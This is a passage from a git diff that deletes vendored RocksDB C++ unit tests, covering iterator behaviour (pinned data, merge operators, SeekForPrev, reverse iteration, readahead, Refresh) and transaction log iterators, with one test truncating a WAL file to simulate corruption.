-      ASSERT_OK(Flush());
-    }
-  }
-  ASSERT_EQ(FilesPerLevel(0), "4");
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ(FilesPerLevel(0), "0,4");
-
-  // Generate 4 sst files in L0
-  for (int i = 1; i <= 1000; i++) {
-    std::string k = Key(i * 2);
-    std::string v = RandomString(&rnd, 100);
-    ASSERT_OK(Put(k, v));
-    true_data[k] = v;
-    if (i % 250 == 0) {
-      ASSERT_OK(Flush());
-    }
-  }
-  ASSERT_EQ(FilesPerLevel(0), "4,4");
-
-  // Add some keys/values in memtables
-  for (int i = 1; i <= 1000; i++) {
-    std::string k = Key(i);
-    std::string v = RandomString(&rnd, 100);
-    ASSERT_OK(Put(k, v));
-    true_data[k] = v;
-  }
-  ASSERT_EQ(FilesPerLevel(0), "4,4");
-
-  ReadOptions ro;
-  ro.pin_data = true;
-  auto iter = db_->NewIterator(ro);
-
-  std::vector<std::pair<Slice, std::string>> results;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    std::string prop_value;
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-    ASSERT_EQ("1", prop_value);
-    results.emplace_back(iter->key(), iter->value().ToString());
-  }
-
-  ASSERT_EQ(results.size(), true_data.size());
-  auto data_iter = true_data.begin();
-  for (size_t i = 0; i < results.size(); i++, data_iter++) {
-    auto& kv = results[i];
-    ASSERT_EQ(kv.first, data_iter->first);
-    ASSERT_EQ(kv.second, data_iter->second);
-  }
-
-  delete iter;
-}
-#endif
-
-TEST_F(DBIteratorTest, PinnedDataIteratorMergeOperator) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions table_options;
-  table_options.use_delta_encoding = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.merge_operator = MergeOperators::CreateUInt64AddOperator();
-  DestroyAndReopen(options);
-
-  std::string numbers[7];
-  for (int val = 0; val <= 6; val++) {
-    PutFixed64(numbers + val, val);
-  }
-
-  // +1 all keys in range [ 0 => 999]
-  for (int i = 0; i < 1000; i++) {
-    WriteOptions wo;
-    ASSERT_OK(db_->Merge(wo, Key(i), numbers[1]));
-  }
-
-  // +2 all keys divisible by 2 in range [ 0 => 999]
-  for (int i = 0; i < 1000; i += 2) {
-    WriteOptions wo;
-    ASSERT_OK(db_->Merge(wo, Key(i), numbers[2]));
-  }
-
-  // +3 all keys divisible by 5 in range [ 0 => 999]
-  for (int i = 0; i < 1000; i += 5) {
-    WriteOptions wo;
-    ASSERT_OK(db_->Merge(wo, Key(i), numbers[3]));
-  }
-
-  ReadOptions ro;
-  ro.pin_data = true;
-  auto iter = db_->NewIterator(ro);
-
-  std::vector<std::pair<Slice, std::string>> results;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    std::string prop_value;
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-    ASSERT_EQ("1", prop_value);
-    results.emplace_back(iter->key(), iter->value().ToString());
-  }
-
-  ASSERT_EQ(results.size(), 1000);
-  for (size_t i = 0; i < results.size(); i++) {
-    auto& kv = results[i];
-    ASSERT_EQ(kv.first, Key(static_cast<int>(i)));
-    int expected_val = 1;
-    if (i % 2 == 0) {
-      expected_val += 2;
-    }
-    if (i % 5 == 0) {
-      expected_val += 3;
-    }
-    ASSERT_EQ(kv.second, numbers[expected_val]);
-  }
-
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, PinnedDataIteratorReadAfterUpdate) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions table_options;
-  table_options.use_delta_encoding = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.write_buffer_size = 100000;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-
-  std::map<std::string, std::string> true_data;
-  for (int i = 0; i < 1000; i++) {
-    std::string k = RandomString(&rnd, 10);
-    std::string v = RandomString(&rnd, 1000);
-    ASSERT_OK(Put(k, v));
-    true_data[k] = v;
-  }
-
-  ReadOptions ro;
-  ro.pin_data = true;
-  auto iter = db_->NewIterator(ro);
-
-  // Delete 50% of the keys and update the other 50%
-  for (auto& kv : true_data) {
-    if (rnd.OneIn(2)) {
-      ASSERT_OK(Delete(kv.first));
-    } else {
-      std::string new_val = RandomString(&rnd, 1000);
-      ASSERT_OK(Put(kv.first, new_val));
-    }
-  }
-
-  std::vector<std::pair<Slice, std::string>> results;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    std::string prop_value;
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-    ASSERT_EQ("1", prop_value);
-    results.emplace_back(iter->key(), iter->value().ToString());
-  }
-
-  auto data_iter = true_data.begin();
-  for (size_t i = 0; i < results.size(); i++, data_iter++) {
-    auto& kv = results[i];
-    ASSERT_EQ(kv.first, data_iter->first);
-    ASSERT_EQ(kv.second, data_iter->second);
-  }
-
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterSeekForPrevCrossingFiles) {
-  Options options = CurrentOptions();
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-  options.disable_auto_compactions = true;
-  // Enable prefix bloom for SST files
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10, true));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("a1", "va1"));
-  ASSERT_OK(Put("a2", "va2"));
-  ASSERT_OK(Put("a3", "va3"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put("b1", "vb1"));
-  ASSERT_OK(Put("b2", "vb2"));
-  ASSERT_OK(Put("b3", "vb3"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put("b4", "vb4"));
-  ASSERT_OK(Put("d1", "vd1"));
-  ASSERT_OK(Put("d2", "vd2"));
-  ASSERT_OK(Put("d4", "vd4"));
-  ASSERT_OK(Flush());
-
-  MoveFilesToLevel(1);
-  {
-    ReadOptions ro;
-    Iterator* iter = db_->NewIterator(ro);
-
-    iter->SeekForPrev("a4");
-    ASSERT_EQ(iter->key().ToString(), "a3");
-    ASSERT_EQ(iter->value().ToString(), "va3");
-
-    iter->SeekForPrev("c2");
-    ASSERT_EQ(iter->key().ToString(), "b3");
-    iter->SeekForPrev("d3");
-    ASSERT_EQ(iter->key().ToString(), "d2");
-    iter->SeekForPrev("b5");
-    ASSERT_EQ(iter->key().ToString(), "b4");
-    delete iter;
-  }
-
-  {
-    ReadOptions ro;
-    ro.prefix_same_as_start = true;
-    Iterator* iter = db_->NewIterator(ro);
-    iter->SeekForPrev("c2");
-    ASSERT_TRUE(!iter->Valid());
-    delete iter;
-  }
-}
-
-TEST_F(DBIteratorTest, IterPrevKeyCrossingBlocks) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1;  // every block will contain one entry
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.merge_operator = MergeOperators::CreateStringAppendTESTOperator();
-  options.disable_auto_compactions = true;
-  options.max_sequential_skip_in_iterations = 8;
-
-  DestroyAndReopen(options);
-
-  // Putting such deletes will force DBIter::Prev() to fallback to a Seek
-  for (int file_num = 0; file_num < 10; file_num++) {
-    ASSERT_OK(Delete("key4"));
-    ASSERT_OK(Flush());
-  }
-
-  // First File containing 5 blocks of puts
-  ASSERT_OK(Put("key1", "val1.0"));
-  ASSERT_OK(Put("key2", "val2.0"));
-  ASSERT_OK(Put("key3", "val3.0"));
-  ASSERT_OK(Put("key4", "val4.0"));
-  ASSERT_OK(Put("key5", "val5.0"));
-  ASSERT_OK(Flush());
-
-  // Second file containing 9 blocks of merge operands
-  ASSERT_OK(db_->Merge(WriteOptions(), "key1", "val1.1"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key1", "val1.2"));
-
-  ASSERT_OK(db_->Merge(WriteOptions(), "key2", "val2.1"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key2", "val2.2"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key2", "val2.3"));
-
-  ASSERT_OK(db_->Merge(WriteOptions(), "key3", "val3.1"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key3", "val3.2"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key3", "val3.3"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key3", "val3.4"));
-  ASSERT_OK(Flush());
-
-  {
-    ReadOptions ro;
-    ro.fill_cache = false;
-    Iterator* iter = db_->NewIterator(ro);
-
-    iter->SeekToLast();
-    ASSERT_EQ(iter->key().ToString(), "key5");
-    ASSERT_EQ(iter->value().ToString(), "val5.0");
-
-    iter->Prev();
-    ASSERT_EQ(iter->key().ToString(), "key4");
-    ASSERT_EQ(iter->value().ToString(), "val4.0");
-
-    iter->Prev();
-    ASSERT_EQ(iter->key().ToString(), "key3");
-    ASSERT_EQ(iter->value().ToString(), "val3.0,val3.1,val3.2,val3.3,val3.4");
-
-    iter->Prev();
-    ASSERT_EQ(iter->key().ToString(), "key2");
-    ASSERT_EQ(iter->value().ToString(), "val2.0,val2.1,val2.2,val2.3");
-
-    iter->Prev();
-    ASSERT_EQ(iter->key().ToString(), "key1");
-    ASSERT_EQ(iter->value().ToString(), "val1.0,val1.1,val1.2");
-
-    delete iter;
-  }
-}
-
-TEST_F(DBIteratorTest, IterPrevKeyCrossingBlocksRandomized) {
-  Options options = CurrentOptions();
-  options.merge_operator = MergeOperators::CreateStringAppendTESTOperator();
-  options.disable_auto_compactions = true;
-  options.level0_slowdown_writes_trigger = (1 << 30);
-  options.level0_stop_writes_trigger = (1 << 30);
-  options.max_sequential_skip_in_iterations = 8;
-  DestroyAndReopen(options);
-
-  const int kNumKeys = 500;
-  // Small number of merge operands to make sure that DBIter::Prev() dont
-  // fall back to Seek()
-  const int kNumMergeOperands = 3;
-  // Use value size that will make sure that every block contain 1 key
-  const int kValSize =
-      static_cast<int>(BlockBasedTableOptions().block_size) * 4;
-  // Percentage of keys that wont get merge operations
-  const int kNoMergeOpPercentage = 20;
-  // Percentage of keys that will be deleted
-  const int kDeletePercentage = 10;
-
-  // For half of the key range we will write multiple deletes first to
-  // force DBIter::Prev() to fall back to Seek()
-  for (int file_num = 0; file_num < 10; file_num++) {
-    for (int i = 0; i < kNumKeys; i += 2) {
-      ASSERT_OK(Delete(Key(i)));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  Random rnd(301);
-  std::map<std::string, std::string> true_data;
-  std::string gen_key;
-  std::string gen_val;
-
-  for (int i = 0; i < kNumKeys; i++) {
-    gen_key = Key(i);
-    gen_val = RandomString(&rnd, kValSize);
-
-    ASSERT_OK(Put(gen_key, gen_val));
-    true_data[gen_key] = gen_val;
-  }
-  ASSERT_OK(Flush());
-
-  // Separate values and merge operands in different file so that we
-  // make sure that we dont merge them while flushing but actually
-  // merge them in the read path
-  for (int i = 0; i < kNumKeys; i++) {
-    if (rnd.OneIn(static_cast<int>(100.0 / kNoMergeOpPercentage))) {
-      // Dont give merge operations for some keys
-      continue;
-    }
-
-    for (int j = 0; j < kNumMergeOperands; j++) {
-      gen_key = Key(i);
-      gen_val = RandomString(&rnd, kValSize);
-
-      ASSERT_OK(db_->Merge(WriteOptions(), gen_key, gen_val));
-      true_data[gen_key] += "," + gen_val;
-    }
-  }
-  ASSERT_OK(Flush());
-
-  for (int i = 0; i < kNumKeys; i++) {
-    if (rnd.OneIn(static_cast<int>(100.0 / kDeletePercentage))) {
-      gen_key = Key(i);
-
-      ASSERT_OK(Delete(gen_key));
-      true_data.erase(gen_key);
-    }
-  }
-  ASSERT_OK(Flush());
-
-  {
-    ReadOptions ro;
-    ro.fill_cache = false;
-    Iterator* iter = db_->NewIterator(ro);
-    auto data_iter = true_data.rbegin();
-
-    for (iter->SeekToLast(); iter->Valid(); iter->Prev()) {
-      ASSERT_EQ(iter->key().ToString(), data_iter->first);
-      ASSERT_EQ(iter->value().ToString(), data_iter->second);
-      data_iter++;
-    }
-    ASSERT_EQ(data_iter, true_data.rend());
-
-    delete iter;
-  }
-
-  {
-    ReadOptions ro;
-    ro.fill_cache = false;
-    Iterator* iter = db_->NewIterator(ro);
-    auto data_iter = true_data.rbegin();
-
-    int entries_right = 0;
-    std::string seek_key;
-    for (iter->SeekToLast(); iter->Valid(); iter->Prev()) {
-      // Verify key/value of current position
-      ASSERT_EQ(iter->key().ToString(), data_iter->first);
-      ASSERT_EQ(iter->value().ToString(), data_iter->second);
-
-      bool restore_position_with_seek = rnd.Uniform(2);
-      if (restore_position_with_seek) {
-        seek_key = iter->key().ToString();
-      }
-
-      // Do some Next() operations the restore the iterator to orignal position
-      int next_count =
-          entries_right > 0 ? rnd.Uniform(std::min(entries_right, 10)) : 0;
-      for (int i = 0; i < next_count; i++) {
-        iter->Next();
-        data_iter--;
-
-        ASSERT_EQ(iter->key().ToString(), data_iter->first);
-        ASSERT_EQ(iter->value().ToString(), data_iter->second);
-      }
-
-      if (restore_position_with_seek) {
-        // Restore orignal position using Seek()
-        iter->Seek(seek_key);
-        for (int i = 0; i < next_count; i++) {
-          data_iter++;
-        }
-
-        ASSERT_EQ(iter->key().ToString(), data_iter->first);
-        ASSERT_EQ(iter->value().ToString(), data_iter->second);
-      } else {
-        // Restore original position using Prev()
-        for (int i = 0; i < next_count; i++) {
-          iter->Prev();
-          data_iter++;
-
-          ASSERT_EQ(iter->key().ToString(), data_iter->first);
-          ASSERT_EQ(iter->value().ToString(), data_iter->second);
-        }
-      }
-
-      entries_right++;
-      data_iter++;
-    }
-    ASSERT_EQ(data_iter, true_data.rend());
-
-    delete iter;
-  }
-}
-
-TEST_F(DBIteratorTest, IteratorWithLocalStatistics) {
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 1000; i++) {
-    // Key 10 bytes / Value 10 bytes
-    ASSERT_OK(Put(RandomString(&rnd, 10), RandomString(&rnd, 10)));
-  }
-
-  std::atomic<uint64_t> total_next(0);
-  std::atomic<uint64_t> total_next_found(0);
-  std::atomic<uint64_t> total_prev(0);
-  std::atomic<uint64_t> total_prev_found(0);
-  std::atomic<uint64_t> total_bytes(0);
-
-  std::vector<port::Thread> threads;
-  std::function<void()> reader_func_next = [&]() {
-    SetPerfLevel(kEnableCount);
-    get_perf_context()->Reset();
-    Iterator* iter = db_->NewIterator(ReadOptions());
-
-    iter->SeekToFirst();
-    // Seek will bump ITER_BYTES_READ
-    uint64_t bytes = 0;
-    bytes += iter->key().size();
-    bytes += iter->value().size();
-    while (true) {
-      iter->Next();
-      total_next++;
-
-      if (!iter->Valid()) {
-        break;
-      }
-      total_next_found++;
-      bytes += iter->key().size();
-      bytes += iter->value().size();
-    }
-
-    delete iter;
-    ASSERT_EQ(bytes, get_perf_context()->iter_read_bytes);
-    SetPerfLevel(kDisable);
-    total_bytes += bytes;
-  };
-
-  std::function<void()> reader_func_prev = [&]() {
-    SetPerfLevel(kEnableCount);
-    Iterator* iter = db_->NewIterator(ReadOptions());
-
-    iter->SeekToLast();
-    // Seek will bump ITER_BYTES_READ
-    uint64_t bytes = 0;
-    bytes += iter->key().size();
-    bytes += iter->value().size();
-    while (true) {
-      iter->Prev();
-      total_prev++;
-
-      if (!iter->Valid()) {
-        break;
-      }
-      total_prev_found++;
-      bytes += iter->key().size();
-      bytes += iter->value().size();
-    }
-
-    delete iter;
-    ASSERT_EQ(bytes, get_perf_context()->iter_read_bytes);
-    SetPerfLevel(kDisable);
-    total_bytes += bytes;
-  };
-
-  for (int i = 0; i < 10; i++) {
-    threads.emplace_back(reader_func_next);
-  }
-  for (int i = 0; i < 15; i++) {
-    threads.emplace_back(reader_func_prev);
-  }
-
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_DB_NEXT), (uint64_t)total_next);
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_DB_NEXT_FOUND),
-            (uint64_t)total_next_found);
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_DB_PREV), (uint64_t)total_prev);
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_DB_PREV_FOUND),
-            (uint64_t)total_prev_found);
-  ASSERT_EQ(TestGetTickerCount(options, ITER_BYTES_READ), (uint64_t)total_bytes);
-
-}
-
-TEST_F(DBIteratorTest, ReadAhead) {
-  Options options;
-  env_->count_random_reads_ = true;
-  options.env = env_;
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 4 << 20;
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  table_options.no_block_cache = true;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  Reopen(options);
-
-  std::string value(1024, 'a');
-  for (int i = 0; i < 100; i++) {
-    Put(Key(i), value);
-  }
-  ASSERT_OK(Flush());
-  MoveFilesToLevel(2);
-
-  for (int i = 0; i < 100; i++) {
-    Put(Key(i), value);
-  }
-  ASSERT_OK(Flush());
-  MoveFilesToLevel(1);
-
-  for (int i = 0; i < 100; i++) {
-    Put(Key(i), value);
-  }
-  ASSERT_OK(Flush());
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ("1,1,1", FilesPerLevel());
-#endif  // !ROCKSDB_LITE
-
-  env_->random_read_bytes_counter_ = 0;
-  options.statistics->setTickerCount(NO_FILE_OPENS, 0);
-  ReadOptions read_options;
-  auto* iter = db_->NewIterator(read_options);
-  iter->SeekToFirst();
-  int64_t num_file_opens = TestGetTickerCount(options, NO_FILE_OPENS);
-  size_t bytes_read = env_->random_read_bytes_counter_;
-  delete iter;
-
-  env_->random_read_bytes_counter_ = 0;
-  options.statistics->setTickerCount(NO_FILE_OPENS, 0);
-  read_options.readahead_size = 1024 * 10;
-  iter = db_->NewIterator(read_options);
-  iter->SeekToFirst();
-  int64_t num_file_opens_readahead = TestGetTickerCount(options, NO_FILE_OPENS);
-  size_t bytes_read_readahead = env_->random_read_bytes_counter_;
-  delete iter;
-  ASSERT_EQ(num_file_opens + 3, num_file_opens_readahead);
-  ASSERT_GT(bytes_read_readahead, bytes_read);
-  ASSERT_GT(bytes_read_readahead, read_options.readahead_size * 3);
-
-  // Verify correctness.
-  iter = db_->NewIterator(read_options);
-  int count = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_EQ(value, iter->value());
-    count++;
-  }
-  ASSERT_EQ(100, count);
-  for (int i = 0; i < 100; i++) {
-    iter->Seek(Key(i));
-    ASSERT_EQ(value, iter->value());
-  }
-  delete iter;
-}
-
-// Insert a key, create a snapshot iterator, overwrite key lots of times,
-// seek to a smaller key. Expect DBIter to fall back to a seek instead of
-// going through all the overwrites linearly.
-TEST_F(DBIteratorTest, DBIteratorSkipRecentDuplicatesTest) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.max_sequential_skip_in_iterations = 3;
-  options.prefix_extractor = nullptr;
-  options.write_buffer_size = 1 << 27;  // big enough to avoid flush
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-
-  // Insert.
-  ASSERT_OK(Put("b", "0"));
-
-  // Create iterator.
-  ReadOptions ro;
-  std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-  // Insert a lot.
-  for (int i = 0; i < 100; ++i) {
-    ASSERT_OK(Put("b", std::to_string(i + 1).c_str()));
-  }
-
-#ifndef ROCKSDB_LITE
-  // Check that memtable wasn't flushed.
-  std::string val;
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level0", &val));
-  EXPECT_EQ("0", val);
-#endif
-
-  // Seek iterator to a smaller key.
-  get_perf_context()->Reset();
-  iter->Seek("a");
-  ASSERT_TRUE(iter->Valid());
-  EXPECT_EQ("b", iter->key().ToString());
-  EXPECT_EQ("0", iter->value().ToString());
-
-  // Check that the seek didn't do too much work.
-  // Checks are not tight, just make sure that everything is well below 100.
-  EXPECT_LT(get_perf_context()->internal_key_skipped_count, 4);
-  EXPECT_LT(get_perf_context()->internal_recent_skipped_count, 8);
-  EXPECT_LT(get_perf_context()->seek_on_memtable_count, 10);
-  EXPECT_LT(get_perf_context()->next_on_memtable_count, 10);
-  EXPECT_LT(get_perf_context()->prev_on_memtable_count, 10);
-
-  // Check that iterator did something like what we expect.
-  EXPECT_EQ(get_perf_context()->internal_delete_skipped_count, 0);
-  EXPECT_EQ(get_perf_context()->internal_merge_count, 0);
-  EXPECT_GE(get_perf_context()->internal_recent_skipped_count, 2);
-  EXPECT_GE(get_perf_context()->seek_on_memtable_count, 2);
-  EXPECT_EQ(1, options.statistics->getTickerCount(
-                 NUMBER_OF_RESEEKS_IN_ITERATION));
-}
-
-TEST_F(DBIteratorTest, Refresh) {
-  ASSERT_OK(Put("x", "y"));
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-  iter->Seek(Slice("a"));
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("x")), 0);
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  ASSERT_OK(Put("c", "d"));
-
-  iter->Seek(Slice("a"));
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("x")), 0);
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  iter->Refresh();
-
-  iter->Seek(Slice("a"));
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("c")), 0);
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("x")), 0);
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  dbfull()->Flush(FlushOptions());
-
-  ASSERT_OK(Put("m", "n"));
-
-  iter->Seek(Slice("a"));
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("c")), 0);
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("x")), 0);
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  iter->Refresh();
-
-  iter->Seek(Slice("a"));
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("c")), 0);
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("m")), 0);
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("x")), 0);
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  iter.reset();
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_log_iter_test.cc b/thirdparty/rocksdb/db/db_log_iter_test.cc
deleted file mode 100644
index e7f94c4..0000000
--- a/thirdparty/rocksdb/db/db_log_iter_test.cc
+++ /dev/null
@@ -1,294 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Introduction of SyncPoint effectively disabled building and running this test
-// in Release build.
-// which is a pity, it is a good test
-#if !defined(ROCKSDB_LITE)
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class DBTestXactLogIterator : public DBTestBase {
- public:
-  DBTestXactLogIterator() : DBTestBase("/db_log_iter_test") {}
-
-  std::unique_ptr<TransactionLogIterator> OpenTransactionLogIter(
-      const SequenceNumber seq) {
-    unique_ptr<TransactionLogIterator> iter;
-    Status status = dbfull()->GetUpdatesSince(seq, &iter);
-    EXPECT_OK(status);
-    EXPECT_TRUE(iter->Valid());
-    return iter;
-  }
-};
-
-namespace {
-SequenceNumber ReadRecords(
-    std::unique_ptr<TransactionLogIterator>& iter,
-    int& count) {
-  count = 0;
-  SequenceNumber lastSequence = 0;
-  BatchResult res;
-  while (iter->Valid()) {
-    res = iter->GetBatch();
-    EXPECT_TRUE(res.sequence > lastSequence);
-    ++count;
-    lastSequence = res.sequence;
-    EXPECT_OK(iter->status());
-    iter->Next();
-  }
-  return res.sequence;
-}
-
-void ExpectRecords(
-    const int expected_no_records,
-    std::unique_ptr<TransactionLogIterator>& iter) {
-  int num_records;
-  ReadRecords(iter, num_records);
-  ASSERT_EQ(num_records, expected_no_records);
-}
-}  // namespace
-
-TEST_F(DBTestXactLogIterator, TransactionLogIterator) {
-  do {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-    Put(0, "key1", DummyString(1024));
-    Put(1, "key2", DummyString(1024));
-    Put(1, "key2", DummyString(1024));
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 3U);
-    {
-      auto iter = OpenTransactionLogIter(0);
-      ExpectRecords(3, iter);
-    }
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-    env_->SleepForMicroseconds(2 * 1000 * 1000);
-    {
-      Put(0, "key4", DummyString(1024));
-      Put(1, "key5", DummyString(1024));
-      Put(0, "key6", DummyString(1024));
-    }
-    {
-      auto iter = OpenTransactionLogIter(0);
-      ExpectRecords(6, iter);
-    }
-  } while (ChangeCompactOptions());
-}
-
-#ifndef NDEBUG  // sync point is not included with DNDEBUG build
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorRace) {
-  static const int LOG_ITERATOR_RACE_TEST_COUNT = 2;
-  static const char* sync_points[LOG_ITERATOR_RACE_TEST_COUNT][4] = {
-      {"WalManager::GetSortedWalFiles:1",  "WalManager::PurgeObsoleteFiles:1",
-       "WalManager::PurgeObsoleteFiles:2", "WalManager::GetSortedWalFiles:2"},
-      {"WalManager::GetSortedWalsOfType:1",
-       "WalManager::PurgeObsoleteFiles:1",
-       "WalManager::PurgeObsoleteFiles:2",
-       "WalManager::GetSortedWalsOfType:2"}};
-  for (int test = 0; test < LOG_ITERATOR_RACE_TEST_COUNT; ++test) {
-    // Setup sync point dependency to reproduce the race condition of
-    // a log file moved to archived dir, in the middle of GetSortedWalFiles
-    rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      { { sync_points[test][0], sync_points[test][1] },
-        { sync_points[test][2], sync_points[test][3] },
-      });
-
-    do {
-      rocksdb::SyncPoint::GetInstance()->ClearTrace();
-      rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-      Options options = OptionsForLogIterTest();
-      DestroyAndReopen(options);
-      Put("key1", DummyString(1024));
-      dbfull()->Flush(FlushOptions());
-      Put("key2", DummyString(1024));
-      dbfull()->Flush(FlushOptions());
-      Put("key3", DummyString(1024));
-      dbfull()->Flush(FlushOptions());
-      Put("key4", DummyString(1024));
-      ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 4U);
-      dbfull()->FlushWAL(false);
-
-      {
-        auto iter = OpenTransactionLogIter(0);
-        ExpectRecords(4, iter);
-      }
-
-      rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-      // trigger async flush, and log move. Well, log move will
-      // wait until the GetSortedWalFiles:1 to reproduce the race
-      // condition
-      FlushOptions flush_options;
-      flush_options.wait = false;
-      dbfull()->Flush(flush_options);
-
-      // "key5" would be written in a new memtable and log
-      Put("key5", DummyString(1024));
-      dbfull()->FlushWAL(false);
-      {
-        // this iter would miss "key4" if not fixed
-        auto iter = OpenTransactionLogIter(0);
-        ExpectRecords(5, iter);
-      }
-    } while (ChangeCompactOptions());
-  }
-}
-#endif
-
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorStallAtLastRecord) {
-  do {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    Put("key1", DummyString(1024));
-    auto iter = OpenTransactionLogIter(0);
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    iter->Next();
-    ASSERT_TRUE(!iter->Valid());
-    ASSERT_OK(iter->status());
-    Put("key2", DummyString(1024));
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorCheckAfterRestart) {
-  do {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    Put("key1", DummyString(1024));
-    Put("key2", DummyString(1023));
-    dbfull()->Flush(FlushOptions());
-    Reopen(options);
-    auto iter = OpenTransactionLogIter(0);
-    ExpectRecords(2, iter);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorCorruptedLog) {
-  do {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    for (int i = 0; i < 1024; i++) {
-      Put("key"+ToString(i), DummyString(10));
-    }
-    dbfull()->Flush(FlushOptions());
-    dbfull()->FlushWAL(false);
-    // Corrupt this log to create a gap
-    rocksdb::VectorLogPtr wal_files;
-    ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files));
-    const auto logfile_path = dbname_ + "/" + wal_files.front()->PathName();
-    if (mem_env_) {
-      mem_env_->Truncate(logfile_path, wal_files.front()->SizeFileBytes() / 2);
-    } else {
-      ASSERT_EQ(0, truncate(logfile_path.c_str(),
-                   wal_files.front()->SizeFileBytes() / 2));
-    }
-
-    // Insert a new entry to a new log file
-    Put("key1025", DummyString(10));
